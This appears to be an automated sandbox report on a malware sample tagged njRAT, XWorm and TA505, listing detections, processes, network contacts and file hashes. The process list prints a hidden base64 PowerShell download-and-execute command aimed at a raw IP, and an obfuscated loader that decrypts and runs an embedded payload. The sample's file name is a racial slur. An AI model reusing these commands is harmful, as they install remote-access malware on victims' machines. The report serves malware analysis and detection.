Malware Analysis Report

2025-01-23 12:20

Sample ID 241204-rz18qstmbl
Target 241204-p9yjgs1nbp_pw_infected.zip
SHA256 74d74bfdd9852c7967a852d632c16dc347b358fead85c04b04a809d9a35fb2c9
Tags
pyinstaller njrat ta505 xworm execution rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

74d74bfdd9852c7967a852d632c16dc347b358fead85c04b04a809d9a35fb2c9

Threat Level: Known bad

The file 241204-p9yjgs1nbp_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

pyinstaller njrat ta505 xworm execution rat trojan

njRAT/Bladabindi

TA505

Xworm

Njrat family

Detect Xworm Payload

Ta505 family

Xworm family

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-04 14:38

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-04 14:38

Reported

2024-12-04 14:39

Platform

win10v2004-20241007-en

Max time kernel

18s

Max time network

24s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Njrat family

njrat

TA505

ta505

Ta505 family

ta505

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\26.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Noninteractive -windowstyle hidden -e UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBTAGMAbwBwAGUAIABQAHIAbwBjAGUAcwBzACAALQBGAG8AcgBjAGUAOwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAALQBiAG8AcgAgADMAMAA3ADIAOwAgAGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcANgAuADEAMQAxAC4AMQA3ADQALgAxADMAOAAvAHUAcwBlAHIAcwB5AG4AYwAvAHQAcgBhAGQAZQBkAGUAcwBrAC8AXwByAHAAJwApACkAKQApAA==

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"

C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe"

C:\Users\Admin\Downloads\UrlHausFiles\app64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\app64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 127.0.0.1:53992 tcp
US 8.8.8.8:53 49.66.101.151.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 3434.filelu.cloud udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 kolobrownsalesye-fong.com udp
US 8.8.8.8:53 irp.cdn-website.com udp
RU 31.41.244.11:80 31.41.244.11 tcp
NL 45.200.148.86:80 45.200.148.86 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 216.158.238.61:80 216.158.238.61 tcp
NL 95.169.201.100:18960 tcp
NL 95.169.201.100:18960 tcp
US 66.165.227.66:80 66.165.227.66 tcp
US 66.165.227.66:80 66.165.227.66 tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
HK 43.155.93.125:80 43.155.93.125 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 39.102.210.162:8080 tcp
CN 123.60.37.61:9999 tcp
US 136.0.44.4:8000 136.0.44.4 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
CN 125.33.228.48:8085 tcp
CN 123.130.204.103:8888 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
DE 49.12.117.119:80 49.12.117.119 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
TR 178.242.54.178:80 178.242.54.178 tcp
US 75.18.210.21:80 75.18.210.21 tcp
HK 219.77.72.53:80 219.77.72.53 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
CN 110.40.250.173:2324 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
CN 121.235.184.125:9000 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
TR 178.242.54.178:88 178.242.54.178 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
BR 189.61.50.98:8080 189.61.50.98 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
HK 149.88.73.206:80 149.88.73.206 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 cdn-downloads.com udp
US 8.8.8.8:53 dctdownload.s3.amazonaws.com udp
US 67.23.237.28:80 3434.filelu.cloud tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 8.8.8.8:53 cdn-downloads-now.xyz udp
US 67.23.237.28:443 3434.filelu.cloud tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 csg-app.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 198.54.115.214:443 kolobrownsalesye-fong.com tcp
NL 18.239.69.25:443 irp.cdn-website.com tcp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
IE 52.92.32.177:443 dctdownload.s3.amazonaws.com tcp
IE 52.218.106.42:443 dctdownload.s3.amazonaws.com tcp
US 8.8.8.8:53 a18qqq1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 host-95-255-114-11.business.telecomitalia.it udp
US 8.8.8.8:53 file.edunet.ac udp
US 8.8.8.8:53 hnjgdl.geps.glodon.com udp
CN 47.104.169.91:80 tcp
CN 39.100.33.142:9092 tcp
GB 20.26.156.215:443 github.com tcp
SE 85.230.143.101:80 85.230.143.101 tcp
MX 187.225.233.208:80 187.225.233.208 tcp
US 8.8.8.8:53 sgz-1302338321.cos.ap-guangzhou.myqcloud.com udp
CN 139.159.155.204:81 tcp
HK 103.59.103.198:80 103.59.103.198 tcp
CN 218.22.21.248:58080 tcp
MA 102.53.15.17:80 102.53.15.17 tcp
HK 47.79.66.208:80 a18qqq1.oss-cn-hongkong.aliyuncs.com tcp
US 50.116.92.169:443 csg-app.com tcp
IT 95.255.114.11:80 host-95-255-114-11.business.telecomitalia.it tcp
US 8.8.8.8:53 dl.natgo.cn udp
CN 159.75.57.69:443 sgz-1302338321.cos.ap-guangzhou.myqcloud.com tcp
US 50.116.92.169:443 csg-app.com tcp
US 50.116.92.169:443 csg-app.com tcp
TH 45.141.26.180:443 tcp
IE 52.218.106.42:443 dctdownload.s3.amazonaws.com tcp
IE 52.218.102.42:443 dctdownload.s3.amazonaws.com tcp
CN 180.167.115.186:8011 tcp
US 74.64.155.4:9090 74.64.155.4 tcp
CN 222.186.172.42:1000 tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
US 8.8.8.8:53 karoonpc.com udp
IE 52.218.30.154:443 dctdownload.s3.amazonaws.com tcp
CN 106.42.31.65:8088 tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 119.117.12.49.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 138.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 8.8.8.8:53 42.106.218.52.in-addr.arpa udp
US 8.8.8.8:53 177.32.92.52.in-addr.arpa udp
US 8.8.8.8:53 151.122.250.159.in-addr.arpa udp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
US 8.8.8.8:53 86.148.200.45.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 132.249.42.81.in-addr.arpa udp
US 8.8.8.8:53 25.69.239.18.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
US 8.8.8.8:53 1.153.59.68.in-addr.arpa udp
US 8.8.8.8:53 66.227.165.66.in-addr.arpa udp
US 8.8.8.8:53 28.237.23.67.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 178.54.242.178.in-addr.arpa udp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 214.115.54.198.in-addr.arpa udp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
US 8.8.8.8:53 98.50.61.189.in-addr.arpa udp
US 8.8.8.8:53 125.93.155.43.in-addr.arpa udp
US 8.8.8.8:53 53.72.77.219.in-addr.arpa udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 90.252.1.121.in-addr.arpa udp
US 8.8.8.8:53 101.143.230.85.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 4.44.0.136.in-addr.arpa udp
US 8.8.8.8:53 206.73.88.149.in-addr.arpa udp
US 8.8.8.8:53 6.74.155.218.in-addr.arpa udp
US 8.8.8.8:53 208.233.225.187.in-addr.arpa udp
US 8.8.8.8:53 198.103.59.103.in-addr.arpa udp
US 8.8.8.8:53 42.102.218.52.in-addr.arpa udp
US 8.8.8.8:53 4.155.64.74.in-addr.arpa udp
CN 47.120.46.210:80 tcp
NL 194.122.165.170:80 194.122.165.170 tcp
IR 217.172.98.87:443 karoonpc.com tcp
NL 185.180.196.46:80 185.180.196.46 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
CA 50.65.169.30:81 50.65.169.30 tcp
US 64.234.95.70:80 64.234.95.70 tcp
CN 59.110.104.183:8888 hnjgdl.geps.glodon.com tcp
LU 107.189.5.6:80 107.189.5.6 tcp
IE 52.218.102.42:443 dctdownload.s3.amazonaws.com tcp
KR 221.143.46.92:80 file.edunet.ac tcp
RU 176.111.174.138:443 tcp
CN 121.40.100.23:12616 tcp
US 8.8.8.8:53 61.238.158.216.in-addr.arpa udp
US 8.8.8.8:53 87.98.172.217.in-addr.arpa udp
US 8.8.8.8:53 46.196.180.185.in-addr.arpa udp
US 8.8.8.8:53 194.48.233.193.in-addr.arpa udp
US 8.8.8.8:53 30.169.65.50.in-addr.arpa udp
US 8.8.8.8:53 70.95.234.64.in-addr.arpa udp
US 8.8.8.8:53 11.114.255.95.in-addr.arpa udp
US 8.8.8.8:53 17.15.53.102.in-addr.arpa udp
US 8.8.8.8:53 6.5.189.107.in-addr.arpa udp
US 8.8.8.8:53 169.92.116.50.in-addr.arpa udp
US 8.8.8.8:53 208.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 180.26.141.45.in-addr.arpa udp
US 8.8.8.8:53 154.30.218.52.in-addr.arpa udp
CN 61.183.42.119:888 dl.natgo.cn tcp
RU 45.151.62.250:80 45.151.62.250 tcp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
US 8.8.8.8:53 cd.textfiles.com udp
PE 161.132.57.101:80 www.grupodulcemar.pe tcp
US 8.8.8.8:53 912648.aioc.qbgxl.com udp
TR 5.26.97.52:80 5.26.97.52 tcp
IE 52.218.30.154:443 dctdownload.s3.amazonaws.com tcp
IE 52.218.90.82:443 dctdownload.s3.amazonaws.com tcp
US 8.8.8.8:53 250.62.151.45.in-addr.arpa udp
US 8.8.8.8:53 170.165.122.194.in-addr.arpa udp
CN 61.160.195.64:80 912648.aioc.qbgxl.com tcp
US 208.86.224.90:80 cd.textfiles.com tcp
US 8.8.8.8:53 90.224.86.208.in-addr.arpa udp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
VN 103.77.173.146:80 tcp
IE 52.92.33.1:443 dctdownload.s3.amazonaws.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23562\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\_MEI23562\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\_MEI23562\base_library.zip

MD5 9836732a064983e8215e2e26e5b66974
SHA1 02e9a46f5a82fa5de6663299512ca7cd03777d65
SHA256 3dfe7d63f90833e0f3de22f450ed5ee29858bb12fe93b41628afe85657a3b61f
SHA512 1435ba9bc8d35a9336dee5db06944506953a1bcf340e9bdad834828170ce826dcfb1fa80274cd9df667e47b83348139b38ab317055a5a3e6824df15adf8a4d86

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_ctypes.pyd

MD5 6a9ca97c039d9bbb7abf40b53c851198
SHA1 01bcbd134a76ccd4f3badb5f4056abedcff60734
SHA256 e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535
SHA512 dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

C:\Users\Admin\AppData\Local\Temp\_MEI23562\python3.DLL

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_uuid.pyd

MD5 9a4957bdc2a783ed4ba681cba2c99c5c
SHA1 f73d33677f5c61deb8a736e8dde14e1924e0b0dc
SHA256 f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44
SHA512 027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_ssl.pyd

MD5 069bccc9f31f57616e88c92650589bdd
SHA1 050fc5ccd92af4fbb3047be40202d062f9958e57
SHA256 cb42e8598e3fa53eeebf63f2af1730b9ec64614bda276ab2cd1f1c196b3d7e32
SHA512 0e5513fbe42987c658dba13da737c547ff0b8006aecf538c2f5cf731c54de83e26889be62e5c8a10d2c91d5ada4d64015b640dab13130039a5a8a5ab33a723dc

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_queue.pyd

MD5 ff8300999335c939fcce94f2e7f039c0
SHA1 4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a
SHA256 2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78
SHA512 f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_overlapped.pyd

MD5 01ad7ca8bc27f92355fd2895fc474157
SHA1 15948cd5a601907ff773d0b48e493adf0d38a1a6
SHA256 a083e83f609ed7a2fc18a95d44d8f91c9dc74842f33e19e91988e84db94c3b5b
SHA512 8fe6ac8430f8dde45c74f45575365753042642dc9fa9defbcf25ae1832baf6abb1ea1ad6d087e4ece5d0590e36cee1beea99845aef6182c1eec4bafdf9557604

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_multiprocessing.pyd

MD5 1386dbc6dcc5e0be6fef05722ae572ec
SHA1 470f2715fafd5cafa79e8f3b0a5434a6da78a1ba
SHA256 0ae3bf383ff998886f97576c55d6bf0a076c24395cf6fcd2265316e9a6e8c007
SHA512 ca6e5c33273f460c951cb8ec1d74ce61c0025e2ead6d517c18a6b0365341a0fd334e8976006cd62b72eb5620ccc42cfdd5196e8b10691b8f19f69f851a440293

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_lzma.pyd

MD5 337b0e65a856568778e25660f77bc80a
SHA1 4d9e921feaee5fa70181eba99054ffa7b6c9bb3f
SHA256 613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a
SHA512 19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_hashlib.pyd

MD5 de4d104ea13b70c093b07219d2eff6cb
SHA1 83daf591c049f977879e5114c5fea9bbbfa0ad7b
SHA256 39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e
